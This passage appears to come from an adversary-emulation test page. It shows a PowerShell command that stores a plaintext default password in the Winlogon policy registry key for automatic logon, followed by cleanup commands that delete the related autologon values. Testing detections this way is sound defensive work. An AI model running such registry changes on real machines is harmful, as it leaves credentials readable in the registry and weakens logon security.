New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword  -Value password1 -Force

Cleanup Commands:

1
2
3
4
5
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore

source